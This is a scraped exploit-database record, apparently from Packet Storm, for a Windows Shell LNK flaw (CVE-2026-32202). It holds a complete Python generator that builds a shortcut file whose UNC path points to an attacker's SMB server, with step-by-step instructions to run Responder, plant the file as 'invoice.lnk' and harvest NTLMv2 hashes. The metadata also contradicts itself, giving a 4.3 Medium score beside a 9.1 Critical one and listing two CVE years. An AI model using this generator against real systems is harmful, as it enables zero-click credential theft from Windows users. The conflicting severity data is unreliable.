{“lastseen”:”2026-05-27T16:16:10″,”description”:”A spoofing vulnerability in Windows Shell File Explorer allows an attacker to capture NTLMv2 hashes without user interaction. By crafting a malicious .lnk shortcut file with a UNC path pointing to an attacker-controlled SMB server, the target’s Windows…”,”published”:”2026-05-27T00:00:00″,”modified”:”2026-05-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Windows Shell LNK Spoofing \/ NTLMv2 Hash Capture”,”source”:””,”references”:””,”id”:”PACKETSTORM:222045″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-32202″,”CVE-2026-32202″],”sourceData”:”# Titles: CVE-2026-32202 – Windows Shell LNK Spoofing to NTLMv2 Hash Capture\\n # Author: nu11secur1ty\\n # Date: 2026-05-27\\n # Vendor: Microsoft\\n # Software: Windows Shell (File Explorer)\\n # Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-32202\\n \\n ## Description:\\n A spoofing vulnerability in Windows Shell (File Explorer) allows an\\n attacker to capture NTLMv2 hashes without user interaction. By crafting a\\n malicious .lnk (shortcut) file with a UNC path pointing to an\\n attacker-controlled SMB server, the target’s Windows system automatically\\n sends an NTLMv2 authentication request when the folder containing the .lnk\\n file is opened. No click on the shortcut is required \u2013 simply viewing the\\n folder triggers the vulnerability.\\n \\n **CVSS**: 4.3 (Medium) \u2013 NetNTLMv2 hash leak\\n **Attack Vector**: Network (SMB)\\n **Privileges Required**: None (user only needs to open a folder)\\n **User Interaction**: None (zero-click)\\n \\n **Affected Versions**:\\n – Windows 11 23H2, 24H2, 25H2, 26H1\\n – Windows 10 21H2-22H2\\n – Windows Server 2019\/2022\/2025\\n \\n **Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)\\n \\n STATUS: MEDIUM – HIGH\/ Vulnerability\\n \\n [+]Payload:\\n \\n “`POST\\n SMB\/CIFS NTLMv2 Authentication Request\\n UNC Path: \\\\\\\\ATTACKER_IP\\\\share\\\\payload.dll\\n Protocol: SMB2 (port 445)\\n Hash Type: NetNTLMv2\\n “`\\n [+]Exploit:\\n \\n “`\\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n CVE-2026-32202 LNK Exploit Generator\\n Author: nu11secur1ty\\n Generates LNK file that leaks NTLM hash to Responder\/Impacket\\n \\”\\”\\”\\n \\n import struct\\n import sys\\n import os\\n \\n def create_malicious_lnk(attacker_ip, output_file=\\”exploit.lnk\\”,\\n share_name=\\”share\\”):\\n \\”\\”\\”\\n Creates LNK file with UNC path to attacker machine\\n \\”\\”\\”\\n \\n unc_path = f\\”\\\\\\\\\\\\\\\\{attacker_ip}\\\\\\\\{share_name}\\\\\\\\test\\”\\n unc_utf16 = unc_path.encode(‘utf-16le’) + b’\\\\x00\\\\x00’\\n \\n # LNK structure (standard + vulnerable component)\\n lnk = bytearray()\\n \\n # ===== HEADER (76 bytes) =====\\n lnk.extend(struct.pack(‘\\u003cI’, 0x0000004C)) # HeaderSize\\n # LinkCLSID: {00021401-0000-0000-C000-000000000046}\\n \\n lnk.extend(b’\\\\x01\\\\x14\\\\x02\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x46′)\\n lnk.extend(struct.pack(‘\\u003cI’, 0x000002A3)) # LinkFlags\\n (HasName|HasWorkingDir|HasArguments|IsUnicode)\\n lnk.extend(struct.pack(‘\\u003cI’, 0x00000080)) # FileAttributes (NORMAL)\\n lnk.extend(struct.pack(‘\\u003cQ’, 0)) # CreationTime\\n lnk.extend(struct.pack(‘\\u003cQ’, 0)) # AccessTime\\n lnk.extend(struct.pack(‘\\u003cQ’, 0)) # WriteTime\\n lnk.extend(struct.pack(‘\\u003cI’, 0x00001000)) # FileSize\\n lnk.extend(struct.pack(‘\\u003cI’, 0x00000000)) # IconIndex\\n lnk.extend(struct.pack(‘\\u003cI’, 0x00000001)) # ShowCommand (SW_NORMAL)\\n lnk.extend(struct.pack(‘\\u003cH’, 0x0000)) # Hotkey\\n lnk.extend(b’\\\\x00\\\\x00′) # Reserved\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # Reserved2\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # Reserved3\\n \\n # ===== IDLIST (activates when folder is opened) =====\\n # Shell Folder IDITEM\\n lnk.extend(b’\\\\x14\\\\x00′) # ItemID size (20 bytes)\\n \\n lnk.extend(b’\\\\x2e\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00′)\\n lnk.extend(b’\\\\x00\\\\x00′) # Terminating ID\\n \\n # ===== STRING DATA (CRITICAL FOR EXPLOIT) =====\\n # NameString (UNC path – triggers NTLM hash leak)\\n lnk.extend(struct.pack(‘\\u003cH’, len(unc_utf16)))\\n lnk.extend(unc_utf16)\\n \\n # ArgumentsString (empty)\\n lnk.extend(b’\\\\x00\\\\x00′)\\n \\n # WorkingDir (UNC path again)\\n lnk.extend(struct.pack(‘\\u003cH’, len(unc_utf16)))\\n lnk.extend(unc_utf16)\\n \\n # ===== Console Properties (required for some Windows versions) =====\\n lnk.extend(b’\\\\x50\\\\x00\\\\x14\\\\x00′) # dwWindowSize (80×20)\\n lnk.extend(b’\\\\x50\\\\x00\\\\xfa\\\\x00′) # dwBufferSize (80×250)\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # dwFontSize\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # dwFontFamily\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # dwFaceNameLen\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # dwFaceNameOffset\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # dwStyle\\n # 64 bytes padding\\n lnk.extend(b’\\\\x00′ * 64)\\n \\n # Save the file\\n with open(output_file, ‘wb’) as f:\\n f.write(lnk)\\n \\n return output_file, unc_path\\n \\n def main():\\n print(r\\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 CVE-2026-32202 – LNK Generator \u2551\\n \u2551 Author: nu11secur1ty \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”\\”\\”)\\n \\n if len(sys.argv) \\u003c 2:\\n print(\\”Usage: python3 cve_2026_32202_gen.py \\u003cATTACKER_IP\\u003e\\n [output_file]\\”)\\n print(\\”Example: python3 cve_2026_32202_gen.py 192.168.1.100\\n invoice.lnk\\”)\\n sys.exit(1)\\n \\n attacker_ip = sys.argv[1]\\n output_file = sys.argv[2] if len(sys.argv) \\u003e 2 else \\”exploit.lnk\\”\\n \\n lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)\\n \\n print(f\\”[+] Exploit ready!\\”)\\n print(f\\”[+] File: {lnk_file}\\”)\\n print(f\\”[+] UNC path: {unc_path}\\”)\\n print()\\n print(\\”[*] Next steps:\\”)\\n print(f\\” 1. Start Responder: sudo responder -I eth0 -v\\”)\\n print(f\\” 2. Transfer {lnk_file} to Windows 11 Desktop\\”)\\n print(f\\” 3. Open Desktop in File Explorer (no click required)\\”)\\n print(f\\” 4. Watch Responder – NTLM hash will appear\\”)\\n print()\\n \\n with open(\\”start_responder.sh\\”, \\”w\\”) as f:\\n f.write(\\”#!\/bin\/bash\\\\n\\”)\\n f.write(\\”echo \\\\\\”[+] Starting Responder…\\\\\\”\\\\n\\”)\\n f.write(\\”sudo responder -I eth0 -v\\\\n\\”)\\n os.chmod(\\”start_responder.sh\\”, 0o755)\\n print(\\”[+] Helper script created: start_responder.sh\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n “`\\n \\n \\n Demo:\\n [href](https:\/\/www.patreon.com\/posts\/cve-2026-32202-159362448)\\n \\n Code:\\n [code](\\n https:\/\/github.com\/nu11secur1ty\/CVE-mitre\/tree\/main\/2026\/CVE-2026-32202)\\n \\n Time spent:\\n 02:30:00\\n \\n –“,”sourceHref”:”https:\/\/packetstorm.news\/download\/222045″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222045\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-27T16:16:10″,”description”:”A spoofing vulnerability in Windows Shell File Explorer allows an attacker to capture NTLMv2 hashes without user interaction. By crafting a malicious .lnk shortcut file…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-57525","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n